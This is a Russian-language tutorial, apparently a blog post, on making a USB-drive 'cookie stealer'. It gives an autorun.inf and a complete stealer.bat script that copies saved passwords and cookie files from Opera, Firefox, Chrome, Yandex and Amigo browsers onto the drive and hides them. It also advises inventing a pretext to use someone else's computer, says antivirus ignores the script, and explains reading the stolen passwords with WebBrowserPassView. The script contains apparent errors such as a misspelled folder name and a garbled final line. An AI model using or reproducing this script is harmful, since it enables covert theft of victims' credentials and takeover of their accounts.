Cookie-стиллер из флешки
Мы рассмотрим простой, но эффективный способ быстро узнать пароли, который неосторожный пользователь сохранил в браузере. Это ведь так удобно, не надо запоминать пароль, не нужно каждый раз его вводить ручками и т.д. плюсов масса, но есть один минус и большой - украсть такие пароли вообще не проблема.
Сегодня мы быстро, и вообще не напрягаясь, сделаем из простой флешки cookie-стиллер, а потом расшифруем файлы cookie, чтобы узнать все пароли, сохраненные в браузере.
Для начала вы должны понимать, что такое файл cookieю. Это, в своем роде, такой зашифрованный текстовый документ, в котором храниться основная иформация о пользователе.
Но хватит теории, приступим.
Во-первых, нам понадобиться флешка.
На ней мы создадим два текстовых файла:
первый – autorun.inf
второй – stealer.bat
не забудьте включить отображение расширений файлов, чтоб можно было изменить txt на inf и bat соответственно, это если вдруг кто не догадался)
дальше, в файле autorun мы пишем:[AutoRun]Open=”stealer.bat”
[AutoRun] Open=”stealer.bat”
всё, сохранили, закрыли. Это автозапуск нашего стиллера
В файле stealer.bat пишем:
@echo off md %~d0\Mozilla md %~d0\0pera md %~d0\Google md %~d0\Yandex md %~d0\Amigo CD/D %APPDATA%\Opera\Opera\ cls copy /y wand.dat %~d0\Opera\ copy /y cookies.dat %~d0\Opera\ cd %AppData%\Mozilla\Firefox\Profiles\*.default copy /y cookies.sqlite %~d0\Mozilla copy /y key3.db %~d0\Mozilla copy /y signons.sqlite %~d0\Mozilla copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla cd %localappdata%\Google\Chrome\User Data\Default cls copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google" cd %localappdata%\Yandex\YandexBrowser\User Data\Default copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex" cd %localappdata%\Amigo\User Data\Default copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo" cls ATTRIB -R -A -S -H attrib +h %~d0\Mozilla attrib +h %~d0\Opera attrib +h %~d0\Google attrib +h %~d0\Yandex attrib +h %~d0\Amigo attrib +h %~d0\search.bat attrib +h %~d0\new attrib +h %~d0\autorun.inf del: autorun.inf?
тоже сохраняем, закрываем. После чего заходим в свойства этих файлов и делаем их скрытыми. Стиллер готов.
Теперь стоит остановиться на некоторых нюансах. А именно:
В Windows 10 (и 8) наш авторан не сработает, там эта возможность банально отключена. Поэтому придется придумать способ получить доступ к компьютеру и ручками запустить файл stealer.bat, благо, процесс занимает очень мало времени, а придумать предлог сесть на минуту за чужой компьютер много ума не надо, ведь так? На всех предыдущих версиях винды, всё произойдет само как-только человек вставит флешку в usb порт.
Следующий нюанс - антивирус на эту манипуляцию никак не отреагирует, поэтому антивируса бояться не стоит, а вот фаервол всё это дело заблокирует на раз два. Тут важно понимать, что человек, который установил и настроил фаервол, походу что-то где-то понимает и уж наверняка не будет хранить пароли в браузере (но не факт).
По нюансам всё. Теперь дальше, cookie то мы подрезали, чё с ними делать-то?
Рассказываю. Уже на своем компьютере, в идеале на виртуальной машине, удаляем нафиг свои куки. И вставляем на их место те, которые у нас на флешке. Если вдруг кто не знает где храняться cookie, вот подсказка:
Google Chrome:
C:\Users\Пользователь\AppData\Local\Google\Chrome\User Data\Default (или Profile 1)\файл “Cookies” без расширения
Opera:
C:\Users\Пользователь\AppData\Roaming\Opera Software\Opera Stable\файл “Cookies”
Mozilla Firefox:
C:\Users\Пользователь\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\ файл “cookies.sqlite”
Internet Explorer 11:
C:\Users\Пользователь\AppData\Local\Microsoft\Windows\INetCookies\
C:\Users\Пользователь\AppData\Roaming\Microsoft\Windows\Cookies\
Скопировали. Теперь качаем программу WebBrowserPassView и запускаем, всё. Видим на каких сайтах какие учётные записи и какие там пароли и используем их во благо и в целях безопасности)
А на этом всё, не забывай, что усложнять жизнь с выполнением батников на чужом компьютере стоит только если это действительно необходимо, а в остальных случаях (когда есть возможность) проще запустить WebBrowserPassView и сразу увидеть все пароли.